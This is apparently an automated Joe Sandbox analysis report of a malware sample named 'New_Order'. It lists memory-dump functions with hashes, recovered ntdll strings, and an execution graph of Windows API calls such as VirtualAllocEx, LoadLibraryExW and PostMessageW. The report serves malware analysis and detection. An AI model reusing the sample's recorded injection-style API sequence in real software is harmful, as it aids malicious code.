                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 868dbdccad8783002e944e1bc691afd0cecf498f4d63712439921be85da8563f
                                                                                                • Instruction ID: d6a377e28910744be55ae9b28853f4a9d4b62f7b8d10df457c7ada73622796ce
                                                                                                • Opcode Fuzzy Hash: 868dbdccad8783002e944e1bc691afd0cecf498f4d63712439921be85da8563f
                                                                                                • Instruction Fuzzy Hash: C990023521181402D1007158881470B001597D0302F55C011E2164555DC62589516672
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2cec7201a4f418fb0d9344b6bce4ad29b9b2f925fa0ed05774c4cdde0e241e77
                                                                                                • Instruction ID: e92c00e81678907335cd139d17fa094945593028858789d10f8d66709fbb8687
                                                                                                • Opcode Fuzzy Hash: 2cec7201a4f418fb0d9344b6bce4ad29b9b2f925fa0ed05774c4cdde0e241e77
                                                                                                • Instruction Fuzzy Hash: 90900225221C1042D20075688C14B07001597D0303F55C115E1154554CC91589615622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62e722d63a56e9e51ba6ce740707b379391252708600efcd800f80d6828d024b
                                                                                                • Instruction ID: 9784aafd9dcdc05c9e6e300db4fe39981d9baa2cfa1bc790d5da168327d5316f
                                                                                                • Opcode Fuzzy Hash: 62e722d63a56e9e51ba6ce740707b379391252708600efcd800f80d6828d024b
                                                                                                • Instruction Fuzzy Hash: 6B90022531141402D102715884146060019D7D1345F95C012E2424555DC6258A53A233
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc83a035789bc0cc0e728979fc1adca0fc6c79633d57ba0cb2ec806e3eeb29d5
                                                                                                • Instruction ID: 3771bee380397ed08e40c529431b99f25718c66a0c2dd4d8313dc2022af517db
                                                                                                • Opcode Fuzzy Hash: dc83a035789bc0cc0e728979fc1adca0fc6c79633d57ba0cb2ec806e3eeb29d5
                                                                                                • Instruction Fuzzy Hash: 7890027521141402D14071588404746001597D0301F55C011E6064554EC6598ED56766
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5a4b8e55e127f6bec28a30496de24344183a7dc9d7756fcb13cff8707bcdf768
                                                                                                • Instruction ID: 4896650f04f9ac51855b4b12af34ab4d94e0864a8cb34b7b57cd1da3f22f9d31
                                                                                                • Opcode Fuzzy Hash: 5a4b8e55e127f6bec28a30496de24344183a7dc9d7756fcb13cff8707bcdf768
                                                                                                • Instruction Fuzzy Hash: E890022561141502D10171588404616001A97D0241F95C022E2024555ECA258A92A232
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3b83eb14dec32444ddb809ee0a0c0c85f38cd3c1abb4334f25aca9e592fbc69
                                                                                                • Instruction ID: c900acfaff8d02c4df6f3598329fbf22b252372459f6477323faa646e4cfff3c
                                                                                                • Opcode Fuzzy Hash: b3b83eb14dec32444ddb809ee0a0c0c85f38cd3c1abb4334f25aca9e592fbc69
                                                                                                • Instruction Fuzzy Hash: 5990026521181403D14075588804607001597D0302F55C011E3064555ECA298D516236
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C3010 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cc8dfc0df240d9ad41ae693ff7f01259d272c77ce97e8100a61f412114bcec8b
                                                                                                • Instruction ID: 955b67cc6e78f9a9e091818ead7f724ccab056ed31fe7b604140d818bc5be172
                                                                                                • Opcode Fuzzy Hash: cc8dfc0df240d9ad41ae693ff7f01259d272c77ce97e8100a61f412114bcec8b
                                                                                                • Instruction Fuzzy Hash: A990022521185442D14072588804B0F411597E1202F95C019E5156554CC91589555722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C3090 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 054331e0368a13c498b595fd63d7f3d1622b2e771327fb9076ee26482561d8cb
                                                                                                • Instruction ID: 238b77573cbfaf753244d8a730f8ae869d4f9ac501959bf5c5b6d673f8346e3f
                                                                                                • Opcode Fuzzy Hash: 054331e0368a13c498b595fd63d7f3d1622b2e771327fb9076ee26482561d8cb
                                                                                                • Instruction Fuzzy Hash: A290022525141802D1407158C4147070016D7D0601F55C011E1024554DC6168A6567B2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7bd9bf9c111abe736e2fdc5d5619107c86f06fb0fed331fb356fc3114a8cb693
                                                                                                • Instruction ID: 3806a7a205056c0c77f5c0cbc616f30e44c9194e03658faf9af1cd4b3b3dac28
                                                                                                • Opcode Fuzzy Hash: 7bd9bf9c111abe736e2fdc5d5619107c86f06fb0fed331fb356fc3114a8cb693
                                                                                                • Instruction Fuzzy Hash: FD90043535547103D150715CC4047174015F7F0301F55C031F1C145D4DC555CD557333
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 754d3c89b594972f2de3b37720582e5490a427523a0a7c82f199156bf081d9bf
                                                                                                • Instruction ID: d82b5e2804c350caf406ce77d9bffdcd1de78233700ba03c70306b31356f04b1
                                                                                                • Opcode Fuzzy Hash: 754d3c89b594972f2de3b37720582e5490a427523a0a7c82f199156bf081d9bf
                                                                                                • Instruction Fuzzy Hash: 4090023521241142954072589804A4E411597E1302B95D415E1015554CC91489615322
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c7f4c71619994976c6c01f95a89a6ad46626a1a0856df5ff83d5a0438e7e91f
                                                                                                • Instruction ID: ef902a50d6b42be3399f10af3d671ff9f9fb6af6957c31db8f29a9fd9fdc05ff
                                                                                                • Opcode Fuzzy Hash: 4c7f4c71619994976c6c01f95a89a6ad46626a1a0856df5ff83d5a0438e7e91f
                                                                                                • Instruction Fuzzy Hash: 0390023921141402D51071589804646005697D0301F55D411E1424558DC65489A1A222
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction ID: 0f64689f1f70e66facc080245b4a8f6fe133caddf2b7473eaf64131b33d3ce51
                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 3dc2ca945d5003286bfa4d8e38ec97348b616e3f75f2ccab202ff0c5514e2c44
                                                                                                • Instruction ID: ae0dc5d7be5901afed8cf5f188dee02356852b99505879ac69874a594ab3aca4
                                                                                                • Opcode Fuzzy Hash: 3dc2ca945d5003286bfa4d8e38ec97348b616e3f75f2ccab202ff0c5514e2c44
                                                                                                • Instruction Fuzzy Hash: 0D51D4B6A20117BFDB11DB9CC89097EFBB8BB08640B14832DE6A9D7641D774DE4087A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01332410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 1aa7f9488808ae17b625ae07afb2a6cac9bf9f20792e91bdbae61962eeb451ba
                                                                                                • Instruction ID: d2952a0c1455857edbd5ea65c0e13db333458da53926053698bae0991336863f
                                                                                                • Opcode Fuzzy Hash: 1aa7f9488808ae17b625ae07afb2a6cac9bf9f20792e91bdbae61962eeb451ba
                                                                                                • Instruction Fuzzy Hash: 84510571A0064AAEDB30DF9DC89097FFBF8EF84208B448459E5D6D7681E6B4EA40C764
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 012F4787
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012F4655
                                                                                                • Execute=1, xrefs: 012F4713
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012F46FC
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012F4742
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012F4725
                                                                                                • ExecuteOptions, xrefs: 012F46A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 137c41779ad80244d1e7b173fa45668a21834a933cd607211d02803258c04152
                                                                                                • Instruction ID: bc65b1d096fc516b7cb56f1a693305bfa5334675de2e406fe95952f455a22dde
                                                                                                • Opcode Fuzzy Hash: 137c41779ad80244d1e7b173fa45668a21834a933cd607211d02803258c04152
                                                                                                • Instruction Fuzzy Hash: C351393162021A6EEF25AAA8DCD5FFE77BCAF94744F0400ADD705A71D0E770AA418F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 2f04bced090ea4b70e4baed79c78d624bd3abcb406fca2b14da34db6e4b11ea1
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: EA81C230E6124A8EEF298E6CC8537BEBBB1AF55B90F28431DDB51A72D1C7348840CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: 9d0aa3ad33ffda33a16472313a6e47270f7500b5dfd1a8371eae0cb13e3e1338
                                                                                                • Instruction ID: 966a8bf3e5818c81303d2374d6aad115eaea3d00bc69b7666f6339c87b16c283
                                                                                                • Opcode Fuzzy Hash: 9d0aa3ad33ffda33a16472313a6e47270f7500b5dfd1a8371eae0cb13e3e1338
                                                                                                • Instruction Fuzzy Hash: 9021337AE10119ABDB21DE69DD44AFFBBF8AF94654F44011AEA05E3204E73099018BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F031E
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012F02BD
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012F02E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: 2c6fd58bfd0d60fa40e2c5778b55d2f80edeb79c5e128d49357338aeb5a6fd8b
                                                                                                • Instruction ID: bd6445d4c28cf4b5c54d5442540c3bdefd239a7637bbedee82fcf0d9ef0ad0d4
                                                                                                • Opcode Fuzzy Hash: 2c6fd58bfd0d60fa40e2c5778b55d2f80edeb79c5e128d49357338aeb5a6fd8b
                                                                                                • Instruction Fuzzy Hash: 43E1C030624742DFE725CF28C985B2ABBE1FB84714F540A2DF6A58B2D2D778D844CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F7BAC
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012F7B7F
                                                                                                • RTL: Resource at %p, xrefs: 012F7B8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: 597eb5c50c7fc2b858fbe4aaff621252e80c5ac6ee8099608d81bb905df023b1
                                                                                                • Instruction ID: 72f7efedef83d0f18c5b03d8a2359bbb254491257042046ab9fa548c3f13eceb
                                                                                                • Opcode Fuzzy Hash: 597eb5c50c7fc2b858fbe4aaff621252e80c5ac6ee8099608d81bb905df023b1
                                                                                                • Instruction Fuzzy Hash: 7141E2353247039FD725DE29C891BAAB7E5EF99710F000A2DFA5697280DB71E4058B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F728C
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 012F72C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012F7294
                                                                                                • RTL: Resource at %p, xrefs: 012F72A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: b0f3d683008e2b6d4ea57853f913b704763f4a9bc28ee8c5fde3da678f1d35d8
                                                                                                • Instruction ID: 633efc3d019fcff340a2cee46cdaada5fc607178b3402f366af2e79a55dee06a
                                                                                                • Opcode Fuzzy Hash: b0f3d683008e2b6d4ea57853f913b704763f4a9bc28ee8c5fde3da678f1d35d8
                                                                                                • Instruction Fuzzy Hash: 95410239760203AFD721DE29CC91FAAB7A5FB54714F10062DFA55AB280DB31F84687D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01332300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: e7ebc04868cf41fc4756402e7f95d4a484cceea4edc7e84cc64ae51c52f2a1c8
                                                                                                • Instruction ID: 1851b6ca7b94b7179f59be38a6d59ac857cd6617a91c0b8187a4b310ee7f514a
                                                                                                • Opcode Fuzzy Hash: e7ebc04868cf41fc4756402e7f95d4a484cceea4edc7e84cc64ae51c52f2a1c8
                                                                                                • Instruction Fuzzy Hash: 80316472A102199FDB20DE2DDC40BFFB7F8FB54614F84455AE949E3240EB30AA448BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 7ca3488527565b4157eea8d8351b018447bd10547de7cd0c9e9e590adeba3834
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: D7918071E2021B9BEB24DF6DC8816BEBBA5BF44B20F14871EEB55A72C0D77099408F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01289126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: 9fc680aaff5d717ee0ac307b33b2e7aaf62bff030f1f3368be56f4a2bc7ea548
                                                                                                • Instruction ID: c7add6e011d07f26ccb3a4d0d23041d9e0bfeea0f7a58173184dc76398c9c58d
                                                                                                • Opcode Fuzzy Hash: 9fc680aaff5d717ee0ac307b33b2e7aaf62bff030f1f3368be56f4a2bc7ea548
                                                                                                • Instruction Fuzzy Hash: 1E812B71D1126ADBDB35DB58CC45BEEB7B8AB48714F0041DAEA1AB7280D7705E84CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:9.5%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:123
                                                                                                Total number of Limit Nodes:9
                                                                                                execution_graph 25728 231d300 DuplicateHandle 25729 231d396 25728->25729 25584 22b7668 25586 22b766b 25584->25586 25585 22b7670 25585->25585 25586->25585 25591 22b6838 25586->25591 25588 22b76fd 25589 22b6838 VirtualAllocEx 25588->25589 25590 22b76d8 25589->25590 25592 22b686d 25591->25592 25593 22b6ae2 VirtualAllocEx 25592->25593 25595 22b68c0 25592->25595 25594 22b6b15 25593->25594 25594->25588 25595->25588 25730 22b8958 25731 22b8b18 25730->25731 25734 22b897e 25730->25734 25732 22b8ae3 25732->25732 25734->25732 25735 22b7cc8 25734->25735 25736 22b8bd8 PostMessageW 25735->25736 25737 22b8c44 25736->25737 25737->25734 25596 231ad38 25600 231ae21 25596->25600 25608 231ae30 25596->25608 25597 231ad47 25601 231ae41 25600->25601 25602 231ae64 25600->25602 25601->25602 25616 231b0b8 25601->25616 25620 231b0c8 25601->25620 25602->25597 25603 231ae5c 25603->25602 25604 231b068 GetModuleHandleW 25603->25604 25605 231b095 25604->25605 25605->25597 25609 231ae41 25608->25609 25610 231ae64 25608->25610 25609->25610 25614 231b0b8 LoadLibraryExW 25609->25614 25615 231b0c8 LoadLibraryExW 25609->25615 25610->25597 25611 231ae5c 25611->25610 25612 231b068 GetModuleHandleW 25611->25612 25613 231b095 25612->25613 25613->25597 25614->25611 25615->25611 25617 231b0dc 25616->25617 25619 231b101 25617->25619 25624 231a870 25617->25624 25619->25603 25621 231b0dc 25620->25621 25622 231b101 25621->25622 25623 231a870 LoadLibraryExW 25621->25623 25622->25603 25623->25622 25625 231b2a8 LoadLibraryExW 25624->25625 25627 231b321 25625->25627 25627->25619 25628 231d0b8 25629 231d0fe GetCurrentProcess 25628->25629 25631 231d150 GetCurrentThread 25629->25631 25632 231d149 25629->25632 25633 231d186 25631->25633 25634 231d18d GetCurrentProcess 25631->25634 25632->25631 25633->25634 25637 231d1c3 25634->25637 25635 231d1eb GetCurrentThreadId 25636 231d21c 25635->25636 25637->25635 25707 2314668 25708 231467a 25707->25708 25709 2314686 25708->25709 25711 2314778 25708->25711 25712 231479d 25711->25712 25716 2314878 25712->25716 25720 2314888 25712->25720 25717 23148af 25716->25717 25719 231498c 25717->25719 25724 2314248 25717->25724 25721 23148af 25720->25721 25722 2314248 CreateActCtxA 25721->25722 25723 231498c 25721->25723 25722->25723 25725 2315918 CreateActCtxA 25724->25725 25727 23159db 25725->25727 25638 22b80e0 25639 22b80e5 25638->25639 25642 22b810c 25639->25642 25643 22b8515 25639->25643 